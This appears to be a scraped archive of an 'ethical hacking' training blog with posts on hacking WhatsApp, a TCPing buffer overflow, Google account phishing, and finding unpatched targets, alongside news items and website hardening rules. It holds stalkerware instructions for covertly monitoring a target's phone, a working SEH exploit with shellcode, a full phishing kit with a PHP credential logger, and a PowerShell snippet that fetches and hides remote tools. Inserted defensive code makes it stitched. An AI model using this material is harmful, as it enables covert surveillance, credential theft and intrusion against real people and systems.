ExtremeHacking
Showing posts with label Penetration.

Hacking a WhatsApp Account (5/04/2016)


Institute For Ethical Hacking Course and Ethical Hacking Training in Pune - India
Sadik Shaikh | Extreme Hacking | Cyber Suraksha Abhiyan

[Disclaimer: USAGE OF SPY APPs WITHOUT PRIOR USER CONSENT MAY BE AGAINST YOUR LOCAL LAWS. ALSO THE FOLLOWING CONTENT IS FOR EDUCATIONAL PURPOSE. IF YOU TRY TO CARRY OUT ANY MALICIOUS ACTIVITY, THEN YOU ARE ON YOUR OWN. WE WILL NOT BE RESPONSIBLE FOR IT!]

So, without wasting any time, let’s get started!

WhatsApp Hacking:-

WhatsApp has become one of the most popular apps for sharing messages and media instantly. It has also become a favorite place for many to engage in illicit activities. Therefore, in order to investigate the truth, people are left with no choice other than to hack a WhatsApp account.

We can do this in two ways:

1. WhatsApp Hack using a Spying App: The Easiest Way:-

Even though there are several ways to hack WhatsApp, using a spy app is by far the simplest and easiest way. This method requires no prior hacking knowledge or technical skills to carry out and hence is more suitable for common people. Installing a spy app to hack WhatsApp is as simple as installing any other app on a mobile phone. Out of the several apps out there, mSpy is one of my favorites for hacking WhatsApp.

mSpy Features:-

Hack phone Calls and Text Messages.
Track Real-Time Location with GPS Tracker.
Spy on Contact List and Web Browsing activities.
Monitor Emails, Pictures and Videos.
No Rooting Required!
How to Hack WhatsApp with this App?

Download and Install the app on to the target phone which takes not more than a minute.
After this is done, the app silently records all WhatsApp activities in hidden mode.
All the recorded WhatsApp chat is sent to your online account.
View all the information from anywhere at anytime with your online account.
Want to download mSpy? Download it by clicking here.

2. WhatsApp Hack by Spoofing the MAC Address: The Tough Way:-
There is another method to hack WhatsApp, known as MAC address spoofing, which involves spoofing the MAC address of the target phone on your own phone. Unlike using spy apps, this one is somewhat time consuming and requires technical skills to implement. To spoof the MAC address of the target WhatsApp phone, follow the steps mentioned below:

1. Find out the MAC address of the target phone on which you need to hack the WhatsApp account:

For Android – Navigate to Settings —> About Device —> Status —> Wi-Fi MAC address.
For iPhone – Navigate to Settings —> General —> About —> Wi-Fi address.
2. Once you have the MAC address of the target WhatsApp phone, you can spoof the MAC address as described in my post: Spoofing MAC Address on Android.

3. Next, install WhatsApp on your phone using the target phone number and verify it.

4. Now you have an exact replica of the target WhatsApp account, and you should receive all the conversations and updates on your phone as well.

This method of WhatsApp hacking is quite time consuming and is known to have a lower success rate than the spy app method. Therefore, if you do not have sufficient time and skills to implement this, I still recommend the use of mSpy to successfully hack a WhatsApp account.


www.extremehacking.org
Cyber Suraksha Abhiyan, CEHv9, CHFI, ECSAv9, CAST, ENSA, CCNA, CCNA SECURITY, MCITP, RHCE, CHECKPOINT, ASA FIREWALL, VMWARE, CLOUD, ANDROID Hacking, IPHONE Hacking, NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-India, Ethical Hacking Course in Pune-India

Apple CEO Tim Cook: Kids Need To Learn How To Code From Early Age (12/28/2015)


In today's world, coding has become as important as learning a language to get by while traveling. The IQ level of the younger generation is increasing with the times, and so is the learning capability of children.


The younger one starts learning, the better one gets with time. And maybe that is why we see so many records being broken at a very young age, even though we might not pay attention to it.

Tim Cook, the current CEO of Apple, raised this concern while visiting a Manhattan Apple store for an "Hour of Code" class for third-grade students.

In an interview following his visit to the Apple store, he also stressed compulsory computer-science education, to which schools do not pay enough attention these days. However, he has great hopes and thinks that coding will ultimately become a required class for all kids.
“From an economic standpoint the job segment itself today is huge, but it’s going to become even larger.

According to Cook, if computer science concepts are introduced at a tender age, in a fun way, it's more likely that kids will find these concepts cool enough to carry forward as they grow older. Hence, they will stay interested in computer science and that, in turn, will produce a larger and more diverse tech workforce down the line.

He further added that even if kids don’t grow up to get a lucrative job, they’ll surely discover something amazing and interesting enough to pick up important problem-solving skills along the way.

Joann Khan, the kids' teacher, said that it was probably the first time the kids had been introduced to coding, noting that their school no longer has a computer lab. The kids participated in a gaming event themed on Star Wars. The Star Wars-themed game was created by the non-profit group Code.org in partnership with Disney. On iPad Minis, the kids used basic drag-and-drop commands to program their droid to do things like pick up scrap metal and evade Stormtroopers.

The "Hour of Code" workshop was one of many held by Apple Inc. The main purpose of the "Hour of Code" was to introduce as many students as possible to coding and computer science.


North Korea’s Red Star OS Is The Worst Linux Distro Ever Made (12/28/2015)


The Linux kernel is one of the biggest open source projects on the planet. Anyone can customize it and use it to suit their own purpose. So it shouldn't be surprising that the North Korean dictatorship chose Linux to build its own operating system, one that would spy on its citizens.

Red Star OS, North Korea's own Linux distribution, allows users to see what their government wants them to see. However, two researchers have presented an in-depth analysis of a leaked version of Red Star OS 3. “We found that the features implemented in Red Star OS are the wet dream of a surveillance state dictator,” said Florian Grunow and Niklaus Schiess.

The Red Star Linux OS comes with a plethora of surveillance tools. All the documents and multimedia files are watermarked to make their tracking easier. Its inbuilt antivirus software and web browser point to the internal government servers.

According to the researchers, even though the OS is built on top of the Linux kernel, it comes with the charming looks of Mac OS X. It has multiple safeguards to protect its system files, including an immediate reboot if the system detects any changes.

“Angae means “Fog” in Korean. The term is widely used in parts of custom code used by the Red Star OS. We will lift the fog on the internals of North Korea’s operating system,” the researchers write.

The researchers believe that the OS is made to keep North Koreans isolated. With its Red Star OS, North Korea abuses the principles of free software and uses them to suppress free speech. And to do this, they are using software that is supposed to support free speech. Well, it's irony at its best.

TCPing 2.1.0 Buffer Overflow Vulnerability (11/07/2015)

TCPing "pings" a server on a specific port using TCP/IP by opening and closing a
connection on the specified port. Results are returned in a similar fashion to that
of Microsoft Windows Ping. This application is intended for use in testing for open
ports on remote machines, or as an alternative to the standard "ping" in a case
where ICMP packets are blocked or ignored.



Vulnerability Details:
=====================

If TCPing is called with a specially crafted command-line argument, it raises an exception and overwrites
the pointers to the next SEH record and the SEH handler with our buffer and malicious shellcode.
No suitable POP POP RET address is available in TCPing itself, as its addresses start with a null byte (0x00) that would
break the shellcode. However, TCPing is not compiled with SafeSEH, which is a linker option, so we
can take an address from another module that performs POP POP RET to achieve
arbitrary code execution on the victim's system.
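
The point a defender should take from this advisory is the missing SafeSEH linker option: an SEH overwrite only leads somewhere when the loader accepts an arbitrary handler address. The following is an added example, not code from the advisory, from hyp3rlinx or from the TCPing project. It reads the PE32 headers of a 32-bit image and reports whether the image carries a SafeSEH handler table (IMAGE_LOAD_CONFIG_DIRECTORY32.SEHandlerTable and SEHandlerCount) or the IMAGE_DLLCHARACTERISTICS_NO_SEH flag. Because no real binary ships with this page, build_test_pe constructs a minimal synthetic PE32 image (not a real program, and its handler RVAs are made up) so the parser can be exercised offline.

```python
import struct

NO_SEH_FLAG = 0x0400         # IMAGE_DLLCHARACTERISTICS_NO_SEH in the optional header
LOAD_CONFIG_INDEX = 10       # IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG data-directory slot
LOAD_CONFIG32_MIN_SIZE = 72  # size that reaches SEHandlerTable (+64) and SEHandlerCount (+68)


def rva_to_offset(sections, rva):
    """Map a relative virtual address to a file offset using the section table."""
    for vaddr, vsize, raw_ptr, raw_size in sections:
        if vaddr <= rva < vaddr + max(vsize, raw_size):
            return rva - vaddr + raw_ptr
    raise ValueError("RVA %#x is not inside any section" % rva)


def safeseh_status(data):
    """Report SafeSEH-related properties of a PE32 image supplied as bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    nsect = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    opt = pe_off + 24                                          # start of the optional header
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images carry a SafeSEH handler table")
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    sections = []
    for i in range(nsect):
        hdr = opt + opt_size + 40 * i
        vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", data, hdr + 8)
        sections.append((vaddr, vsize, raw_ptr, raw_size))
    status = {"no_seh": bool(dll_chars & NO_SEH_FLAG), "safeseh": False, "handler_count": 0}
    if ndirs <= LOAD_CONFIG_INDEX:
        return status                                          # no load-config slot at all
    lc_rva, _lc_size = struct.unpack_from("<II", data, opt + 96 + 8 * LOAD_CONFIG_INDEX)
    if lc_rva == 0:
        return status                                          # no load-config directory: no SafeSEH
    lc_off = rva_to_offset(sections, lc_rva)
    if struct.unpack_from("<I", data, lc_off)[0] < LOAD_CONFIG32_MIN_SIZE:
        return status                                          # structure too short to hold the SEH fields
    table_rva, count = struct.unpack_from("<II", data, lc_off + 64)
    status["handler_count"] = count
    status["safeseh"] = table_rva != 0 and count > 0
    return status


def build_test_pe(safeseh, no_seh_flag=False):
    """Constructed minimal PE32 image (not a real program) used to exercise the parser."""
    img = bytearray(0x400)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                    # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    # COFF header: i386, 1 section, SizeOfOptionalHeader=224, EXECUTABLE_IMAGE|32BIT_MACHINE
    struct.pack_into("<HHIIIHH", img, 0x44, 0x14C, 1, 0, 0, 0, 224, 0x102)
    opt = 0x58
    struct.pack_into("<H", img, opt, 0x10B)                    # PE32 magic
    struct.pack_into("<H", img, opt + 70, NO_SEH_FLAG if no_seh_flag else 0)
    struct.pack_into("<I", img, opt + 92, 16)                  # NumberOfRvaAndSizes
    sec = opt + 224                                            # first (and only) section header
    img[sec:sec + 8] = b".rdata\0\0"
    # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData: RVA 0x1000 -> file offset 0x200
    struct.pack_into("<IIII", img, sec + 8, 0x200, 0x1000, 0x200, 0x200)
    if safeseh:
        struct.pack_into("<II", img, opt + 96 + 8 * LOAD_CONFIG_INDEX, 0x1000, 72)
        struct.pack_into("<I", img, 0x200, 72)                 # IMAGE_LOAD_CONFIG_DIRECTORY32.Size
        struct.pack_into("<II", img, 0x200 + 64, 0x1100, 2)    # SEHandlerTable RVA, SEHandlerCount
        struct.pack_into("<II", img, 0x300, 0x1234, 0x1250)    # two made-up handler RVAs
    return bytes(img)


if __name__ == "__main__":
    import sys
    # Pass a 32-bit .exe/.dll path to inspect it; with no argument the synthetic image is used.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_test_pe(safeseh=False)
    print(safeseh_status(data))
```

An image whose report shows neither a handler table nor the NO_SEH flag is in the same position as the TCPing build described above: any address can be installed as an exception handler. Relinking with the /SAFESEH option (or, for code that never registers handlers, /SAFESEH with no handlers, which sets the NO_SEH flag) is the fix on the build side; the check is also a quick way to audit third-party 32-bit binaries before deploying them.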


stack dump...


EAX 00000045
ECX 0040A750 tcping.0040A750
EDX 41414141
EBX 000002CC
ESP 0018FA50
EBP 0018FA50
ESI 0018FD21 ASCII "rror: Unknown host AAAAAA....
EDI 0018FCC8
EIP 0040270A tcping.0040270A
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 1 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr WSANO_DATA (00002AFC)
EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)


WinDBG dump...


(17a8.149c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
eax=00000045 ebx=00000222 ecx=0040a750 edx=41414141 esi=0018fd21 edi=0018fcc8
eip=0040270a esp=0018fa50 ebp=0018fa50 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
image00400000+0x270a:
0040270a 8802 mov byte ptr [edx],al ds:002b:41414141=??



Exploit code(s):
===============

Python script...


import struct,os,subprocess

#Spetnik TCPing Utility 2.1.0
#buffer overflow SEH exploit
#by hyp3rlinx


#pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

vulnpgm="C:\\tcping.exe "

nseh="\xEB\x06"+"\x90"*2 #JMP TO OUR SHELLCODE

seh=struct.pack('<L', 0x77214f99) #POP POP RET

payload="A"*580+nseh+seh+sc+"\x90"*20 #BOOOOOOOM!

subprocess.Popen([vulnpgm, payload], shell=False)



===========================================================


Google Translator Exploit for hacking google accounts.. (5/06/2015)

Ethical Hacking Institute in Pune
./Arizona Team

Google is our companion, but it still has its flaws, as everything tends to. A little-known flaw in the media giant allows phishing of Google accounts that completely bypasses the advanced web protection in users' browsers as well as the other protections Google has put in place. How can it do this? The domain will read as though it is Google itself.

It also plays on human psychology, because the domain appears to be a trusted one that you visit fairly often. This kind of phishing lets people steal credentials in plain text, and by using this technique, the attackers in question likely do so without anyone realising it.

Requirements

A web hosting account

cPanel access to the web host

Step 1: Create a Gmail Phishing Page

First, we need to make a phishing page to get ready.

Open a text file using Notepad, or your choice of text editor.

Go to the Google login page.

Right-click somewhere on the page, and click View page source.

Copy all of the contents of the source code and paste them into your text file.

Hit ctrl + f, search for "action=", change the method to "GET", and change the text to the right of "action=" to "log.php".

Click File > Save as and save it with the name "index.php" (make sure to use the drop-down menu to select "all files" if it is not selected already).

Make another text file, and paste the below as its contents (paste the raw text, not the numbered version). This is the PHP file that logs the victim's login details.

<?php
$handle = fopen("passwords.txt", "a");

foreach ($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}

fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save the file as "log.php". Again, make sure "all files" is selected in the file type drop-down menu.

Log into your hosting account, and upload both files to the root of your site (not in a folder).

When credentials are logged, they will be in a file called "passwords.txt" in the root of your site. Check the box beside the "passwords.txt" file when you get some logs, and click chmod. Change the file to 466 permissions, so other people can't read the victims' passwords.

Step 2 Manipulating Google

How exactly does the manipulation behind this work? Google Translator. Google Translate has a vulnerability: if an attacker makes a fake Gmail login page and then translates it with the tool, they get a perfectly crafted link masked by Google itself. Look at this URL for an example of a phishing page that was made and then hidden behind the translation tool.

This tricks users into thinking the page is genuine. I mean, just look at the URL:

Go to Google Translate.

Translate your page from another language into English.

Click the link and test it.

See how surprisingly easy it is to manipulate even a site as big as Google? Stay safe by always examining the URL.

www.arizonainfotech.com
CEHv8 CHFIv8 ECSAv8 CAST ENSA CCNA CCNA SECURITY MCITP RHCE CHECKPOINT ASA FIREWALL VMWARE CLOUD ANDROID IPHONE NETWORKING HARDWARE TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking, Center For Advanced Security Training in India, IT Security Training Information Security Traning Courses in Pune, ceh certification in pune, Ethical Hacking Course in Pune

Searching Exploits directly from Microsoft site. (5/06/2015)

Credit: Amit

In this article, I will show you guys how to search Exploits directly from Microsoft site..
Step 1: Navigate to Microsoft's Technet

As more than 90% of all PCs in the world run some version of Microsoft's ubiquitous Windows operating system (although it may surprise you that more than 60% of all web servers run some variant of Linux/Unix), Microsoft's vulnerabilities are obviously highly valued by the hacker.

Thankfully, Microsoft offers us a database of every vulnerability they want to acknowledge, and this can be found at their Microsoft Security Bulletins web page.

Here, Microsoft lays out all the details of the vulnerabilities that they are aware of in their operating systems and application software. It goes without saying that zero-day vulnerabilities, and vulnerabilities that Microsoft does not want to acknowledge yet, won't be found here. These are only the vulnerabilities that Microsoft is aware of and has produced a patch for.

So what good is it to the hacker to know about vulnerabilities that Microsoft has patched, you may ask (you did ask that, right?). The answer is that not everybody patches.

Some users and organizations refuse to patch because of the production risks involved, and others patch only intermittently. If you go to Netcraft and look up a particular site, it will tell you how long it has been since that site was rebooted. Generally, a reboot is necessary to patch a system. If the system has not been rebooted for, say, 2 years, we know that all the vulnerabilities listed in Microsoft's security bulletins over that period are present on that system. When that is the case, you can simply find a vulnerability that was discovered within the last two years and then exploit it on that system.

There is also the issue of pirated software. A significant portion of the world's operating systems and applications are pirated (I'm sure you know at least one person who has pirated software, right?). It is estimated that the majority of the software in China and other developing countries is pirated. This means that these systems won't get the latest patches and are vulnerable to the vulnerabilities listed in Microsoft's security bulletins. How nice!

Step 2: Search the Database by Microsoft Vulnerability Number

The Microsoft security bulletins are an easily searched database. You can search them by product, date range or security bulletin number. If you go back and look at some of my Metasploit tutorials, you will notice that we have used an exploit in Metasploit many, many times that is named ms08_067_netapi. That number is the Microsoft security bulletin number. The ms stands for Microsoft, obviously, the 08 stands for the year the vulnerability was disclosed, 2008, and the 067 means it was the 67th vulnerability identified by Microsoft that year. If we search Microsoft's security bulletins for that vulnerability, this is what we find.

Notice that this vulnerability is named "Vulnerability in Server Service Could Allow Remote Code Execution". Remote code execution is exactly what we are looking for. It allows listeners/rootkits to be installed and executed remotely. This obviously includes our rootkit of choice, Metasploit's meterpreter. When we click on it, we get the complete report.

We can see that Microsoft gives us (thank you, Bill!) an official summary of the exploit and tells us which of their systems are vulnerable. If we page down, we can see a list of every affected file and operating system.

Step 3: Search Vulnerabilities by Product

If we are looking for vulnerabilities in a particular product, we can use this database and search by product. For instance, if I were looking for a vulnerability in Microsoft's Lync (this is Microsoft's enterprise-level messaging, VoIP, and video conferencing server with special security features), I can simply select Lync and this database will show me all the vulnerabilities of that product. Here's the latest vulnerability found in Microsoft's Lync product that "allows for remote code execution". Yeah!


Fun with Powershell: Using TOR with Powershell. (5/05/2015)


In this article, I will teach you how to connect to the TOR network using PowerShell.


PowerShell is a powerful weapon for hackers. Those who think that programming is not necessary in the hacking or security field should just go and watch "POGO".
Powershell Code:


function Get-DnsTXTRecord($DnsHost)
{
    $ZipFileUri = (((Invoke-Expression "nslookup -querytype=txt $DnsHost 8.8.8.8") -match '"') -replace '"', '')[0].Trim()
    $WebClient.DownloadFile($ZipFileUri, $ZipPath)
    $Destination = $Shell.NameSpace($ZipPath).Items();
    # Decompress files
    $Shell.NameSpace($ToolsPath).CopyHere($Destination, 20)
    Remove-Item $ZipPath
}

$ToolsPath = Join-Path $Env:APPDATA $MachineGuid

# Mark the path where tools are extracted as 'Hidden', 'System', 'NotContentIndexed'
if (!(Test-Path $ToolsPath))
{
    $Directory = New-Item -ItemType Directory -Force -Path $ToolsPath
    $Directory.Attributes = 'Hidden', 'System', 'NotContentIndexed'
}

$Tor = Join-Path $ToolsPath 'tor.exe'
$Polipo = Join-Path $ToolsPath 'polipo.exe'
$ZipPath = Join-Path $ToolsPath ($MachineGuid + '.zip')
$WebClient = New-Object Net.WebClient
$Shell = New-Object -ComObject Shell.Application

if (!(Test-Path $Tor) -or !(Test-Path $Polipo))
{
    Get-DnsTXTRecord 'REDACTEDREDACTED.de'
}

if (!(Test-Path $Tor) -or !(Test-Path $Polipo))
{
    Get-DnsTXTRecord 'REDACTEDREDACTED.cc'
}

$TorRoamingLog = Join-Path $ToolsPath 'roaminglog'
# Start Tor and maintain an initialization log file
Start-Process $Tor -ArgumentList " --Log `"notice file $TorRoamingLog`"" -WindowStyle Hidden

# Wait for Tor to finish initializing
do
{
    Start-Sleep 1
    $LogContents = Get-Content $TorRoamingLog
}
while (!($LogContents -match 'Bootstrapped 100%: Done.'))

# Start polipo proxy
Start-Process $Polipo -ArgumentList 'socksParentProxy=localhost:9050' -WindowStyle Hidden
Start-Sleep 7
$WebProxy = New-Object Net.WebProxy('localhost:8123')
$WebProxy.UseDefaultCredentials = $True
$WebClient.Proxy = $WebProxy




Secure your websites from DDOS attack in just one minute.. (4/07/2015)


In this article, I will teach you guys on how you could secure your websites from DDOS in just one minute.
Simply paste the following code below in your root directory:

<?php
/*
#####################################################
# Script: DDOS Security By Team Arizona             #
#####################################################
*/

$ad_ddos_query   = 10;             // number of requests per second that counts as a DDoS attack
$ad_check_file   = 'check.txt';    // file holding the current state while monitoring
$ad_temp_file    = 'all_ip.txt';   // temporary file
$ad_black_file   = 'black_ip.txt'; // IPs of zombie machines are written here
$ad_white_file   = 'white_ip.txt'; // IPs of logged-in visitors
$ad_dir          = 'anti_ddos';    // directory holding the scripts
$ad_num_query    = 0;              // current number of requests this second (read from $ad_check_file)
$ad_sec_query    = 0;              // the second those requests were counted in (read from $ad_check_file)
$ad_end_defense  = 0;              // end of the protection window (read from $ad_check_file)
$ad_sec          = date("s");      // current second
$ad_date         = date("mdHis");  // current time
$ad_defense_time = 10000;          // how long protection stays on once an attack is detected (added to the mdHis stamp)

// Every state file and the defence script itself must exist before monitoring can start
if (!file_exists("{$ad_dir}/{$ad_check_file}") or !file_exists("{$ad_dir}/{$ad_temp_file}")
    or !file_exists("{$ad_dir}/{$ad_black_file}") or !file_exists("{$ad_dir}/{$ad_white_file}")
    or !file_exists("{$ad_dir}/anti_ddos.php")) {
    die("Not enough files.");
}

// The check file is a PHP fragment written by this script; loading it restores the counters
require("{$ad_dir}/{$ad_check_file}");

if ($ad_end_defense and $ad_end_defense > $ad_date) {
    // Still inside a protection window: hand the request to the defence script
    require("{$ad_dir}/anti_ddos.php");
} else {
    // Count requests within the current second; a new second restarts the counter
    if ($ad_sec == $ad_sec_query) {
        $ad_num_query++;
    } else {
        $ad_num_query = 1;
    }

    if ($ad_num_query >= $ad_ddos_query) {
        // Threshold reached: record when the protection window ends
        $ad_file = fopen("{$ad_dir}/{$ad_check_file}", "w");
        $ad_end_defense = $ad_date + $ad_defense_time;
        $ad_string = '<?php $ad_end_defense=' . $ad_end_defense . '; ?>';
        fputs($ad_file, $ad_string);
        fclose($ad_file);
    } else {
        // Persist the running count and the second it belongs to
        $ad_file = fopen("{$ad_dir}/{$ad_check_file}", "w");
        $ad_string = '<?php $ad_num_query=' . $ad_num_query . '; $ad_sec_query=' . $ad_sec . '; ?>';
        fputs($ad_file, $ad_string);
        fclose($ad_file);
    }
}
?>
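
The script above keeps a single site-wide counter that resets every second and switches the whole site into defence mode once ten hits land in the same second, so one busy legitimate client (or a page with ten embedded resources) can trip it for everyone. What a practitioner normally wants instead is a per-client limit over a sliding window. The following is an added example, not code from the original post or from Team Arizona: it replays constructed Apache-style access-log lines (not real traffic) through such a limiter; the limit of five requests per two seconds is likewise a constructed choice for the demonstration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed Apache-style access-log lines (not real traffic): one client bursts seven
# requests inside two seconds, the other browses normally.
SAMPLE_LOG = """\
10.0.0.7 - - [07/Apr/2015:12:00:01 +0000] "GET / HTTP/1.1" 200 512
10.0.0.7 - - [07/Apr/2015:12:00:01 +0000] "GET / HTTP/1.1" 200 512
10.0.0.7 - - [07/Apr/2015:12:00:01 +0000] "GET / HTTP/1.1" 200 512
192.0.2.9 - - [07/Apr/2015:12:00:02 +0000] "GET /about HTTP/1.1" 200 1024
10.0.0.7 - - [07/Apr/2015:12:00:02 +0000] "GET / HTTP/1.1" 200 512
10.0.0.7 - - [07/Apr/2015:12:00:02 +0000] "GET / HTTP/1.1" 200 512
10.0.0.7 - - [07/Apr/2015:12:00:02 +0000] "GET / HTTP/1.1" 200 512
10.0.0.7 - - [07/Apr/2015:12:00:02 +0000] "GET / HTTP/1.1" 200 512
10.0.0.7 - - [07/Apr/2015:12:00:04 +0000] "GET / HTTP/1.1" 200 512
192.0.2.9 - - [07/Apr/2015:12:00:05 +0000] "GET /contact HTTP/1.1" 200 900
"""

# client address and the bracketed timestamp of a combined-format log line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\]')


class SlidingWindowLimiter:
    """Per-client limiter: at most `limit` accepted requests in any `window` seconds."""

    def __init__(self, limit, window):
        self.limit = limit
        self.window = window
        self.hits = defaultdict(deque)      # client -> timestamps of accepted requests

    def allow(self, client, now):
        q = self.hits[client]
        while q and now - q[0] >= self.window:   # expire hits that have left the window
            q.popleft()
        if len(q) >= self.limit:
            return False                         # rejected requests are not counted
        q.append(now)
        return True


def replay(log_text, limit=5, window=2):
    """Feed log lines through the limiter; return (client, timestamp) for each rejected request."""
    limiter = SlidingWindowLimiter(limit, window)
    rejected = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, stamp = m.group(1), m.group(2)
        now = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z").timestamp()
        if not limiter.allow(client, now):
            rejected.append((client, stamp))
    return rejected


if __name__ == "__main__":
    for client, stamp in replay(SAMPLE_LOG):
        print("rate limit exceeded:", client, stamp)
```

Only the bursting client is rejected, and only for the requests beyond the fifth in its window; the well-behaved client is never touched, which the shared counter in the PHP script cannot guarantee. Rejected requests are deliberately not counted, so a client recovers as soon as its accepted hits age out of the window.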


Secure your website just in one minute.. (4/06/2015)


In this article, I will teach you guys on how you could secure your websites in just one minute.



Simply create a file named as .htaccess and paste the following code below:

#####################################################
# Script: htaccess Security By Team Arizona         #
#####################################################
# No web server version and indexes
ServerSignature Off
Options -Indexes


# Enable rewrite engine
RewriteEngine On


# Block suspicious request methods
RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK|DEBUG) [NC]
RewriteRule ^(.*)$ - [F,L]


# Block WP timthumb hack
RewriteCond %{REQUEST_URI} (timthumb\.php|phpthumb\.php|thumb\.php|thumbs\.php) [NC]
RewriteRule . - [S=1]




# Block suspicious user agents and requests
RewriteCond %{HTTP_USER_AGENT} (libwww-perl|wget|python|nikto|curl|scan|java|winhttp|clshttp|loader) [NC,OR]
# As published, the next group ended in an empty alternative "|)" that matches every user agent and would have forbidden all requests; the empty branch is dropped
RewriteCond %{HTTP_USER_AGENT} (<|>|'|-|%0A|%0D|%27|%3C|%3E) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (;|<|>|'|-|"|\)|\(|%0A|%0D|%22|%27|%28|%3C|%3E|).*(libwww-perl|wget|python|nikto|curl|scan|java|winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner) [NC,OR]
RewriteCond %{THE_REQUEST} \?\ HTTP/ [NC,OR]
RewriteCond %{THE_REQUEST} \/\*\ HTTP/ [NC,OR]
RewriteCond %{THE_REQUEST} etc/passwd [NC,OR]
RewriteCond %{THE_REQUEST} cgi-bin [NC,OR]
RewriteCond %{THE_REQUEST} (%0A|%0D) [NC,OR]


# Block MySQL injections, RFI, base64, etc.
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC,OR]
RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC,OR]
RewriteCond %{QUERY_STRING} (\.\./|\.\.) [OR]
RewriteCond %{QUERY_STRING} ftp\: [NC,OR]
RewriteCond %{QUERY_STRING} http\: [NC,OR]
RewriteCond %{QUERY_STRING} https\: [NC,OR]
RewriteCond %{QUERY_STRING} \=\|w\| [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)cPath=http://(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (<|%3C)([^i]*i)+frame.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR]
RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*\([^)]*\) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>).* [NC,OR]
RewriteCond %{QUERY_STRING} (NULL|OUTFILE|LOAD_FILE) [OR]
RewriteCond %{QUERY_STRING} (\./|\../|\.../)+(motd|etc|bin) [NC,OR]
RewriteCond %{QUERY_STRING} (localhost|loopback|127\.0\.0\.1) [NC,OR]
# As published, this group contained "||" (an empty alternative) that matches every query string and would have forbidden all requests; the empty branch is dropped
RewriteCond %{QUERY_STRING} (<|>|'|%0A|%0D|%27|%3C|%3E|-) [NC,OR]
RewriteCond %{QUERY_STRING} concat[^\(]*\( [NC,OR]
RewriteCond %{QUERY_STRING} union([^s]*s)+elect [NC,OR]
RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC,OR]
